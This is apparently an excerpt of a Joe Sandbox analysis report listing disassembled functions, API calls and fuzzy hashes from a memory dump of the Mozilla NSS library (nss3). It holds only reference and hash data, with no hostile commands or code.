                                                                                                                                                                                                                                                                                                                      • Source File: 00000002.00000002.1864410556.000000006CDE1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CDE0000, based on PE: true
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1864270690.000000006CDE0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865248315.000000006CF7F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865651933.000000006CFBE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865764551.000000006CFBF000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865853565.000000006CFC0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865945305.000000006CFC5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_6cde0000_file.jbxd
                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                      • API ID: Util$Arena$Alloc_Arena_Item_Value$AllocateCriticalDecodeEnterFindFreeInitLockPoolQuickSectionUnlockZfreecallocfreememcmp
                                                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                                                      • API String ID: 1025791883-0
                                                                                                                                                                                                                                                                                                                      • Opcode ID: 2420a349ca5b98e2199f3bfa24a1edf5493270183d18a1eff4ad70c9f2edf5b8
                                                                                                                                                                                                                                                                                                                      • Instruction ID: 1a0d21fe369fc38017610347de525810aa49233078575f44bed22fc5c3e3f56d
                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 2420a349ca5b98e2199f3bfa24a1edf5493270183d18a1eff4ad70c9f2edf5b8
                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 98F17CB1E01209CBDB08CF54D8407AEB7B2FF45358F36416AE915AB781E735E982CB91
                                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                                      • PR_NewLock.NSS3(00000001,00000000,6CFB0148,?,6CE76FEC), ref: 6CE6502A
                                                                                                                                                                                                                                                                                                                      • PR_NewLock.NSS3(00000001,00000000,6CFB0148,?,6CE76FEC), ref: 6CE65034
                                                                                                                                                                                                                                                                                                                      • PL_NewHashTable.NSS3(00000000,6CEBFE80,6CEBFD30,6CF0C350,00000000,00000000,00000001,00000000,6CFB0148,?,6CE76FEC), ref: 6CE65055
                                                                                                                                                                                                                                                                                                                      • PL_NewHashTable.NSS3(00000000,6CEBFE80,6CEBFD30,6CF0C350,00000000,00000000,?,00000001,00000000,6CFB0148,?,6CE76FEC), ref: 6CE6506D
                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                      • Source File: 00000002.00000002.1864410556.000000006CDE1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CDE0000, based on PE: true
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1864270690.000000006CDE0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865248315.000000006CF7F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865651933.000000006CFBE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865764551.000000006CFBF000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865853565.000000006CFC0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865945305.000000006CFC5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_6cde0000_file.jbxd
                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                      • API ID: HashLockTable
                                                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                                                      • API String ID: 3862423791-0
                                                                                                                                                                                                                                                                                                                      • Opcode ID: 3e373bae6d01ddf8fb13f5da06fe2e214a2175d7939606e62b0fff2039711a40
                                                                                                                                                                                                                                                                                                                      • Instruction ID: 9704fc478e6123518173c027b4e0a7a3d6aa2051e78fb5572a75c5839d5b73e9
                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 3e373bae6d01ddf8fb13f5da06fe2e214a2175d7939606e62b0fff2039711a40
                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 8C3114B2F662109BEB808B668C4CB5737B8DB1331CF266025EA0097B42D776C604CBE1
                                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                                      • memcpy.VCRUNTIME140(00000000,?,?), ref: 6CE02F3D
                                                                                                                                                                                                                                                                                                                      • memset.VCRUNTIME140(?,00000000,?), ref: 6CE02FB9
                                                                                                                                                                                                                                                                                                                      • memcpy.VCRUNTIME140(?,00000000,?), ref: 6CE03005
                                                                                                                                                                                                                                                                                                                      • memcpy.VCRUNTIME140(?,?,?), ref: 6CE030EE
                                                                                                                                                                                                                                                                                                                      • memcpy.VCRUNTIME140(00000000,?,?), ref: 6CE03131
                                                                                                                                                                                                                                                                                                                      • sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,0001086C,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6CE03178
                                                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                      • Source File: 00000002.00000002.1864410556.000000006CDE1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CDE0000, based on PE: true
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1864270690.000000006CDE0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865248315.000000006CF7F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865651933.000000006CFBE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865764551.000000006CFBF000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865853565.000000006CFC0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865945305.000000006CFC5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_6cde0000_file.jbxd
                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                      • API ID: memcpy$memsetsqlite3_log
                                                                                                                                                                                                                                                                                                                      • String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$database corruption
                                                                                                                                                                                                                                                                                                                      • API String ID: 984749767-598938438
                                                                                                                                                                                                                                                                                                                      • Opcode ID: 48435e044d4e5863d6718fd9b8f6c7c49ed21ea289b0fd6913147912fd6b6d54
                                                                                                                                                                                                                                                                                                                      • Instruction ID: 60a74dfa009763c0aeb39a91dcc9ecfc369fd4f0dc62992c8845c340fe4bbf1f
                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 48435e044d4e5863d6718fd9b8f6c7c49ed21ea289b0fd6913147912fd6b6d54
                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 76B19D71F05219DBCB18CF9DC885AEEB7B1BF49304F24802AE845B7B46D3759952CBA0
                                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                                      • PR_GetMonitorEntryCount.NSS3(?,?,00000002,00000050,?,?,?,?,?,00000000), ref: 6CED7FB2
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CE5BA40: TlsGetValue.KERNEL32 ref: 6CE5BA51
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CE5BA40: TlsGetValue.KERNEL32 ref: 6CE5BA6B
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CE5BA40: EnterCriticalSection.KERNEL32 ref: 6CE5BA83
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CE5BA40: TlsGetValue.KERNEL32 ref: 6CE5BAA1
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CE5BA40: _PR_MD_UNLOCK.NSS3 ref: 6CE5BAC0
                                                                                                                                                                                                                                                                                                                      • PR_EnterMonitor.NSS3(?,?,?,00000002,00000050,?,?,?,?,?,00000000), ref: 6CED7FD4
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CF29090: TlsGetValue.KERNEL32 ref: 6CF290AB
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CF29090: TlsGetValue.KERNEL32 ref: 6CF290C9
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CF29090: EnterCriticalSection.KERNEL32 ref: 6CF290E5
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CF29090: TlsGetValue.KERNEL32 ref: 6CF29116
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CF29090: LeaveCriticalSection.KERNEL32 ref: 6CF2913F
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CED9430: PR_SetError.NSS3(FFFFD0AC,00000000), ref: 6CED9466
                                                                                                                                                                                                                                                                                                                      • PR_ExitMonitor.NSS3(?), ref: 6CED801B
                                                                                                                                                                                                                                                                                                                      • PR_EnterMonitor.NSS3(?), ref: 6CED8034
                                                                                                                                                                                                                                                                                                                      • TlsGetValue.KERNEL32 ref: 6CED80A2
                                                                                                                                                                                                                                                                                                                      • PR_SetError.NSS3(FFFFE001,00000000), ref: 6CED80C0
                                                                                                                                                                                                                                                                                                                      • PR_ExitMonitor.NSS3(?), ref: 6CED811C
                                                                                                                                                                                                                                                                                                                      • PR_ExitMonitor.NSS3(?), ref: 6CED8134
                                                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                      • Source File: 00000002.00000002.1864410556.000000006CDE1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CDE0000, based on PE: true
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1864270690.000000006CDE0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865248315.000000006CF7F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865651933.000000006CFBE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865764551.000000006CFBF000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865853565.000000006CFC0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865945305.000000006CFC5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_6cde0000_file.jbxd
                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                      • API ID: Value$Monitor$Enter$CriticalExitSection$Error$CountEntryLeave
                                                                                                                                                                                                                                                                                                                      • String ID: )
                                                                                                                                                                                                                                                                                                                      • API String ID: 3537756449-2427484129
                                                                                                                                                                                                                                                                                                                      • Opcode ID: 39f4bb149136327f8fd36f406ed38bef0dc575ebd0ee2e42cc9292a3ebe19e1d
                                                                                                                                                                                                                                                                                                                      • Instruction ID: f1656068d0eba2613dd7697bc4c5f7d52580a75f307c33daaa0fb230c11c30ec
                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 39f4bb149136327f8fd36f406ed38bef0dc575ebd0ee2e42cc9292a3ebe19e1d
                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: D2511572A007049BF7319F359C017ABB7B0AF5230CF29552ED95946B42EB31B60AC7D2
                                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                                      • PK11_IsInternalKeySlot.NSS3(?,?,00000000,?), ref: 6CE7FCBD
                                                                                                                                                                                                                                                                                                                      • strchr.VCRUNTIME140(?,0000003A,?,?,00000000,?), ref: 6CE7FCCC
                                                                                                                                                                                                                                                                                                                      • strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,00000000,?), ref: 6CE7FCEF
                                                                                                                                                                                                                                                                                                                      • strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6CE7FD32
                                                                                                                                                                                                                                                                                                                      • PORT_ArenaAlloc_Util.NSS3(00000000,00000001), ref: 6CE7FD46
                                                                                                                                                                                                                                                                                                                      • PORT_Alloc_Util.NSS3(00000001), ref: 6CE7FD51
                                                                                                                                                                                                                                                                                                                      • memcpy.VCRUNTIME140(00000000,00000000,-00000001), ref: 6CE7FD6D
                                                                                                                                                                                                                                                                                                                      • memcpy.VCRUNTIME140(00000000,?,?), ref: 6CE7FD84
                                                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                      • Source File: 00000002.00000002.1864410556.000000006CDE1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CDE0000, based on PE: true
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1864270690.000000006CDE0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865248315.000000006CF7F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865651933.000000006CFBE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865764551.000000006CFBF000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865853565.000000006CFC0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865945305.000000006CFC5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_6cde0000_file.jbxd
                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                      • API ID: Alloc_Utilmemcpystrlen$ArenaInternalK11_Slotstrchr
                                                                                                                                                                                                                                                                                                                      • String ID: :
                                                                                                                                                                                                                                                                                                                      • API String ID: 183580322-336475711
                                                                                                                                                                                                                                                                                                                      • Opcode ID: 6b01cbbeec5e53cf722db012dedf94c099d5da7b2fd0114ccdec8c6525f24190
                                                                                                                                                                                                                                                                                                                      • Instruction ID: f4e09224f86b9bd7876d9900cd6b45ae13f3f6adf8e20893f41afe2110415acd
                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 6b01cbbeec5e53cf722db012dedf94c099d5da7b2fd0114ccdec8c6525f24190
                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 5231AFB29002155BEB208BA4AE057AF77B8AF5521CF250129DD14A7B00E779E919C7F2
                                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                                      • PL_InitArenaPool.NSS3(?,security,00000800,00000008), ref: 6CE60F62
                                                                                                                                                                                                                                                                                                                      • SEC_QuickDERDecodeItem_Util.NSS3(?,?,?,?), ref: 6CE60F84
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CEBB030: PR_SetError.NSS3(FFFFE005,00000000,?,?,6CF918D0,?), ref: 6CEBB095
                                                                                                                                                                                                                                                                                                                      • SEC_QuickDERDecodeItem_Util.NSS3(?,6CE7F59B,6CF8890C,?), ref: 6CE60FA8
                                                                                                                                                                                                                                                                                                                      • PORT_Alloc_Util.NSS3(4C8B1474), ref: 6CE60FC1
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CEC0BE0: malloc.MOZGLUE(6CEB8D2D,?,00000000,?), ref: 6CEC0BF8
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CEC0BE0: TlsGetValue.KERNEL32(6CEB8D2D,?,00000000,?), ref: 6CEC0C15
                                                                                                                                                                                                                                                                                                                      • memcpy.VCRUNTIME140(00000000,?,4C8B1474), ref: 6CE60FDB
                                                                                                                                                                                                                                                                                                                      • PR_CallOnce.NSS3(6CFC2AA4,6CEC12D0), ref: 6CE60FEF
                                                                                                                                                                                                                                                                                                                      • PL_FreeArenaPool.NSS3(?), ref: 6CE61001
                                                                                                                                                                                                                                                                                                                      • PL_FinishArenaPool.NSS3(?), ref: 6CE61009
                                                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                      • Source File: 00000002.00000002.1864410556.000000006CDE1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CDE0000, based on PE: true
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1864270690.000000006CDE0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865248315.000000006CF7F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865651933.000000006CFBE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865764551.000000006CFBF000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865853565.000000006CFC0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865945305.000000006CFC5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_6cde0000_file.jbxd
                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                      • API ID: ArenaPoolUtil$DecodeItem_Quick$Alloc_CallErrorFinishFreeInitOnceValuemallocmemcpy
                                                                                                                                                                                                                                                                                                                      • String ID: security
                                                                                                                                                                                                                                                                                                                      • API String ID: 2061345354-3315324353
                                                                                                                                                                                                                                                                                                                      • Opcode ID: 6cc5cdf78356f5b8399e5345be36e78a3e33a0822f8cfb0fd9d146ef9368fbb0
                                                                                                                                                                                                                                                                                                                      • Instruction ID: 3cb27f887b6a2c034d8134944f67df3019d056257d4751683f392a75c6405c0c
                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 6cc5cdf78356f5b8399e5345be36e78a3e33a0822f8cfb0fd9d146ef9368fbb0
                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: E62106B1A00204ABEB109F25DD81ABBB7B4EF4465CF208519FC2897701F732D905CBA2
                                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                                      • SECITEM_ArenaDupItem_Util.NSS3(?,6CE67D8F,6CE67D8F,?,?), ref: 6CE66DC8
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CEBFDF0: PORT_ArenaAlloc_Util.NSS3(?,0000000C,00000000,?,?), ref: 6CEBFE08
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CEBFDF0: PORT_ArenaAlloc_Util.NSS3(?,?,?,?,?,?), ref: 6CEBFE1D
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CEBFDF0: memcpy.VCRUNTIME140(00000000,?,?,?,?,?,?), ref: 6CEBFE62
                                                                                                                                                                                                                                                                                                                      • PORT_ArenaAlloc_Util.NSS3(?,00000010,?,?,6CE67D8F,?,?), ref: 6CE66DD5
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CEC10C0: TlsGetValue.KERNEL32(?,6CE68802,00000000,00000008,?,6CE5EF74,00000000), ref: 6CEC10F3
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CEC10C0: EnterCriticalSection.KERNEL32(?,?,6CE68802,00000000,00000008,?,6CE5EF74,00000000), ref: 6CEC110C
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CEC10C0: PL_ArenaAllocate.NSS3(?,?,?,6CE68802,00000000,00000008,?,6CE5EF74,00000000), ref: 6CEC1141
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CEC10C0: PR_Unlock.NSS3(?,?,?,6CE68802,00000000,00000008,?,6CE5EF74,00000000), ref: 6CEC1182
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CEC10C0: TlsGetValue.KERNEL32(?,6CE68802,00000000,00000008,?,6CE5EF74,00000000), ref: 6CEC119C
                                                                                                                                                                                                                                                                                                                      • SEC_QuickDERDecodeItem_Util.NSS3(?,00000000,6CF88FA0,00000000,?,?,?,?,6CE67D8F,?,?), ref: 6CE66DF7
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CEBB030: PR_SetError.NSS3(FFFFE005,00000000,?,?,6CF918D0,?), ref: 6CEBB095
                                                                                                                                                                                                                                                                                                                      • SECITEM_ArenaDupItem_Util.NSS3(?,00000000), ref: 6CE66E35
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CEBFDF0: PORT_Alloc_Util.NSS3(0000000C,00000000,?,?), ref: 6CEBFE29
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CEBFDF0: PORT_Alloc_Util.NSS3(?,?,?,?), ref: 6CEBFE3D
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CEBFDF0: free.MOZGLUE(00000000,?,?,?,?), ref: 6CEBFE6F
                                                                                                                                                                                                                                                                                                                      • PORT_ArenaAlloc_Util.NSS3(?,0000005C), ref: 6CE66E4C
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CEC10C0: PL_ArenaAllocate.NSS3(?,6CE68802,00000000,00000008,?,6CE5EF74,00000000), ref: 6CEC116E
                                                                                                                                                                                                                                                                                                                      • SEC_QuickDERDecodeItem_Util.NSS3(?,00000000,6CF88FE0,00000000), ref: 6CE66E82
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CE66AF0: SECITEM_ArenaDupItem_Util.NSS3(00000000,6CE6B21D,00000000,00000000,6CE6B219,?,6CE66BFB,00000000,?,00000000,00000000,?,?,?,6CE6B21D), ref: 6CE66B01
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CE66AF0: SEC_QuickDERDecodeItem_Util.NSS3(00000000,00000000,00000000), ref: 6CE66B8A
                                                                                                                                                                                                                                                                                                                      • SECITEM_ArenaDupItem_Util.NSS3(?,00000000), ref: 6CE66F1E
                                                                                                                                                                                                                                                                                                                      • PORT_ArenaAlloc_Util.NSS3(?,0000005C), ref: 6CE66F35
                                                                                                                                                                                                                                                                                                                      • SEC_QuickDERDecodeItem_Util.NSS3(?,00000000,6CF88FE0,00000000), ref: 6CE66F6B
                                                                                                                                                                                                                                                                                                                      • PR_SetError.NSS3(FFFFE005,00000000,6CE67D8F,?,?), ref: 6CE66FE1
                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                      • Source File: 00000002.00000002.1864410556.000000006CDE1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CDE0000, based on PE: true
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1864270690.000000006CDE0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865248315.000000006CF7F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865651933.000000006CFBE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865764551.000000006CFBF000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865853565.000000006CFC0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865945305.000000006CFC5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_6cde0000_file.jbxd
                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                      • API ID: Util$Arena$Item_$Alloc_$DecodeQuick$AllocateErrorValue$CriticalEnterSectionUnlockfreememcpy
                                                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                                                      • API String ID: 587344769-0
                                                                                                                                                                                                                                                                                                                      • Opcode ID: 3d5dca8ce813a19b727c6fda82d4c7f8748755ec557e27cf640e2481deb7b519
                                                                                                                                                                                                                                                                                                                      • Instruction ID: 353b214b55c006d7fa44cc42a060996d944edde07cf2ce2ceb82d6829cbc41d7
                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 3d5dca8ce813a19b727c6fda82d4c7f8748755ec557e27cf640e2481deb7b519
                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 68717F71E602469BDB00CF56CD41BAAB7B8BF9530CF254229E818D7B11F771EA94CB90
                                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                                      • strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6CEA1057
                                                                                                                                                                                                                                                                                                                      • PR_SetError.NSS3(FFFFE005,00000000), ref: 6CEA1085
                                                                                                                                                                                                                                                                                                                      • PK11_GetAllTokens.NSS3 ref: 6CEA10B1
                                                                                                                                                                                                                                                                                                                      • free.MOZGLUE(?), ref: 6CEA1107
                                                                                                                                                                                                                                                                                                                      • PR_SetError.NSS3(00000000,00000000), ref: 6CEA1172
                                                                                                                                                                                                                                                                                                                      • free.MOZGLUE(?), ref: 6CEA1182
                                                                                                                                                                                                                                                                                                                      • free.MOZGLUE(?), ref: 6CEA11A6
                                                                                                                                                                                                                                                                                                                      • SECITEM_ItemsAreEqual_Util.NSS3(?,?), ref: 6CEA11C5
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CEA52C0: TlsGetValue.KERNEL32(?,00000001,00000002,?,?,?,?,?,?,?,?,?,?,6CE7EAC5,00000001), ref: 6CEA52DF
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CEA52C0: EnterCriticalSection.KERNEL32(?), ref: 6CEA52F3
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CEA52C0: PR_Unlock.NSS3(?), ref: 6CEA5358
                                                                                                                                                                                                                                                                                                                      • PORT_ZAlloc_Util.NSS3(0000000C), ref: 6CEA11D3
                                                                                                                                                                                                                                                                                                                      • PORT_ZAlloc_Util.NSS3(0000000C), ref: 6CEA11F3
                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                      • Source File: 00000002.00000002.1864410556.000000006CDE1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CDE0000, based on PE: true
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1864270690.000000006CDE0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865248315.000000006CF7F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865651933.000000006CFBE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865764551.000000006CFBF000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865853565.000000006CFC0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865945305.000000006CFC5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_6cde0000_file.jbxd
                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                      • API ID: Utilfree$Alloc_Error$CriticalEnterEqual_ItemsK11_SectionTokensUnlockValuestrlen
                                                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                                                      • API String ID: 1549229083-0
                                                                                                                                                                                                                                                                                                                      • Opcode ID: ca92572b08e34852257b34e552402681c99da7b5d6d1d587e0a82df3bd56cd4f
                                                                                                                                                                                                                                                                                                                      • Instruction ID: 5e2e34f11b26cd6c72fc39cabdb7518d2ca7937ea7c46ada1ef5dd8421cd054c
